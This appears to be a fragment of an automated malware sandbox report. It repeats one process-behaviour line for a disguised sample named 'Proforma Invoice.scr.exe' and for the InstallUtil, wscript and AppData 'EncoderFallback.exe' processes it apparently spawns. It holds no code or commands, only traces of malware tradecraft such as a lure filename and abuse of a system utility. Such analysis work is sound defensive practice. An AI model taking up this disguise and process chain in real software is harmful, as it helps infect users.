                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
